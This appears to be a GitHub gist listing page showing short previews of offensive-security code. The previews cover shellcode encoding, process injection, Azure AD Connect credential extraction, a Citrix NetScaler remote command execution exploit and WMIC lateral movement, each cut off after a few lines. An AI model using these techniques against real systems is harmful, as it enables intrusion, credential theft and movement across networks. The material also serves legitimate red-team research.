This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from uuid import UUID | |
| import os | |
| import sys | |
| # Usage: python3 binToUUIDs.py shellcode.bin [--print] | |
| print(""" | |
| ____ _ _______ _ _ _ _ _____ _____ | |
| | _ \(_) |__ __| | | | | | | |_ _| __ \ | |
| | |_) |_ _ __ | | ___ | | | | | | | | | | | | |___ |
jfmaes
/ DInjectQueuerAPC.cs
Created
November 13, 2020 19:00
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace DinjectorWithQUserAPC | |
| { | |
| public class Program |
fnmsd
/ dfs_classloader.java
Last active
April 6, 2024 05:45
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Author:fnmsd | |
| //Blog:https://blog.csdn.net/fnmsd | |
| import java.io.PrintWriter; | |
| import java.lang.reflect.Field; | |
| import java.lang.reflect.InvocationTargetException; | |
| import java.lang.reflect.Method; | |
| import java.util.HashSet; | |
| import java.util.Scanner; |
fnmsd
/ FindClass_final.java
Last active
July 12, 2022 07:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Author:fnmsd | |
| //Blog:https://blog.csdn.net/fnmsd | |
| import javax.servlet.http.HttpServletRequest; | |
| import javax.servlet.http.HttpServletResponse; | |
| import java.lang.reflect.Field; | |
| import java.util.HashSet; | |
| import java.util.Scanner; | |
| public class a { |
xpn
/ azuread_decrypt_msol_v2.ps1
Last active
February 4, 2026 13:50
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)" | |
| Write-Host "`t[ Updated to support new cryptokey storage method ]`n" | |
| $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync" | |
| try { | |
| $client.Open() | |
| } catch { | |
| Write-Host "[!] Could not connect to localdb..." | |
| return |
xpn
/ dotnet_etw.c
Created
March 16, 2020 19:25
A demo of how to collect information on basic .NET events from ETW.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define AssemblyDCStart_V1 155 | |
| #define MethodLoadVerbose_V1 143 | |
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <wbemidl.h> | |
| #include <wmistr.h> | |
| #include <evntrace.h> | |
| #include <Evntcons.h> |
asolino
/ gist:45095268f0893bcf08bca3ae68a755b2
Last active
May 28, 2020 10:28
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import argparse | |
| import string | |
| import sys | |
| from impacket import nmb | |
| from impacket.smb3 import SMB2_COMPRESSION_TRANSFORM_HEADER, SMB3, SMB2_DIALECT_311, SMB2_NEGOTIATE_SIGNING_REQUIRED, \ | |
| SMB2_NEGOTIATE_SIGNING_ENABLED, STATUS_SUCCESS, SMB2_DIALECT_30, \ | |
| SMB2_GLOBAL_CAP_ENCRYPTION, SMB2_DIALECT_WILDCARD, SMB2Negotiate_Response, SMB2_NEGOTIATE, \ | |
| SMB2Negotiate, SMB311ContextData, SMB2NegotiateContext, SMB2_PREAUTH_INTEGRITY_CAPABILITIES, \ |
0x09AL
/ netscaler_exploit.py
Created
January 13, 2020 11:12
Citrix ADC / NetScaler Remote Command Execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import time | |
| append_value = str(time.time()) | |
| print "# By 0x09AL - MDSec ActiveBreach \n" | |
| def upload_file(url,payload): | |
| endpoint = url + "/vpns/portal/scripts/newbm.pl" |
Ridter
/ wmicLateralMovement.txt
Created
December 17, 2019 11:51
— forked from G0ldenGunSec/wmicLateralMovement.txt
WMIC Service Modification for Lateral Movement
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| As always, only for use on networks you own or have permission to test against. | |
| Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely. | |
| If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well. | |
| The process involves a total of four commands, three of which can be combined on the command line to form one large block. | |
| Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager) | |
| wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName |
G0ldenGunSec
/ wmicLateralMovement.txt
Created
December 11, 2019 14:55
WMIC Service Modification for Lateral Movement
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| As always, only for use on networks you own or have permission to test against. | |
| Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely. | |
| If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well. | |
| The process involves a total of four commands, three of which can be combined on the command line to form one large block. | |
| Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager) | |
| wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName |